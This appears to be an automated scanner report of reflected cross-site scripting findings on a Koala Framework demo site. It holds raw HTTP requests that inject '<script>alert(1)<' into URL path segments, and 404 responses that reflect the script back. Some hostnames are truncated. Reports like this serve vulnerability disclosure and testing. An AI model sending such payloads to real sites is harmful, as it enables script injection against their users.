1. Cross-site scripting (reflected)
1.1. http://app-demo.koala-framework.org/assets/all/web/en/Admin.css [REST URL parameter 1]
1.2. http://app-demo.koala-framework.org/assets/all/web/en/Admin.css [REST URL parameter 4]
1.3. http://app-demo.koala-framework.org/assets/all/web/en/Admin.css [REST URL parameter 5]
Severity: | High |
Confidence: | Certain |
Host: | http://app-demo.koala |
Path: | /assets/all/web/en/Admin |
GET /assets3e608<script>alert(1)< Host: app-demo.koala-framework Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Accept: text/css,*/*;q=0.1 Referer: http://app-demo.koala Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=e469de7d05 Content-Length: 10 |
HTTP/1.1 404 Not Found Date: Sun, 25 Dec 2011 22:06:04 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny10 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 272 Connection: close Content-Type: text/html; charset=utf-8 <html> <head> <title>404 Not Found</title> </head> <body> <h1>Not Found</h1> <p>The requested URL "/assets3e608<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://app-demo.koala |
Path: | /assets/all/web/en/Admin |
GET /assets/all/web/ena72a7<script>alert(1)< Host: app-demo.koala-framework Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Accept: text/css,*/*;q=0.1 Referer: http://app-demo.koala Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=e469de7d05 Content-Length: 10 |
HTTP/1.1 404 Not Found Date: Sun, 25 Dec 2011 22:06:19 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 271 Connection: close Content-Type: text/html; charset=utf-8 <html> <head> <title>404 Not Found</title> </head> <body> <h1>Not Found</h1> <p>The requested URL "/assets/all/web/ena72a7<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://app-demo.koala |
Path: | /assets/all/web/en/Admin |
GET /assets/all/web/en/Admin Host: app-demo.koala-framework Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.7 Accept: text/css,*/*;q=0.1 Referer: http://app-demo.koala Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=e469de7d05 Content-Length: 10 |
HTTP/1.1 404 Not Found Date: Sun, 25 Dec 2011 22:06:23 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny10 Content-Length: 272 Connection: close Content-Type: text/html; charset=utf-8 <html> <head> <title>404 Not Found</title> </head> <body> <h1>Not Found</h1> <p>The requested URL "/assets/all/web/en/Admin ...[SNIP]... |